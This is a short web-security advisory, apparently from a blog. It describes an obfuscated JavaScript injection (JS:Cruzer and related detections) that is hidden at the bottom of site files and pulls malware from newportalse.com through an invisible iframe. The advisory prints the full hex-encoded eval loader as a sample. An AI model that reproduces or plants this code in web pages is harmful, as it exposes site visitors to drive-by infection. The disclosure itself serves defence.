JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW

Description:

A malicious and encoded javascript file was found inside the site content and is being used to distribute malware (from newportalse.com and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product).

Domains used in this attack:

newportalse.com
(and many others)

Affecting:

Any web site (no specific target).

Clean up:

This malware is generally hidden at the bottom of the .html or javascript files.

Malware dump (sample of malware):

var _0x4de4=[“x64x20x35x28x29x7Bx62x20x30x3Dx32x2Ex63x28x22x33x22x29x3B
x32x2Ex39x2Ex36x28x30x29x3Bx30x2Ex37x3Dx27x33x27x3Bx30x2Ex31x2Ex61x3Dx27x34x27x3Bx30x2Ex31x2Ex6Bx3Dx27x34x27x3Bx30x2Ex69x3Dx27x66x3Ax2Fx2Fx67x2Dx68x2Ex6Dx2F
x6Ax2Ex65x27x7Dx38x28x35x2Cx6Cx29x3B”,”x7C”,”x73x70x6Cx69
x74″,”x65x6Cx7Cx73x74x79x6Cx65x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx69x66x72x61x6Dx65x7Cx31x70x78x7Cx4Dx61x6Bx65x46x72x61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69
x6Cx64x7Cx69x64x7Cx73x65x74x54x69x6Dx65x6Fx75x74x7Cx62x6Fx64x79x7Cx77x69x64x74
x68x7Cx76x61x72x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx66x75x6Ex63x74x69x6Fx6Ex7Cx70x68x70x7Cx68x74x74x70x7Cx63x6Fx75x6Ex74x65x72x7Cx77x6Fx72x64x70x72
x65x73x73x7Cx73x72x63x7Cx66x72x61x6Dx65x7Cx68x65x69x67x68x74x7Cx31x30x30x30x7C
x63x6Fx6D”,”x72x65x70x6Cx61x63x65″,””,”x5Cx77x2B”,”x5Cx62″,”x67″];eval(function
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.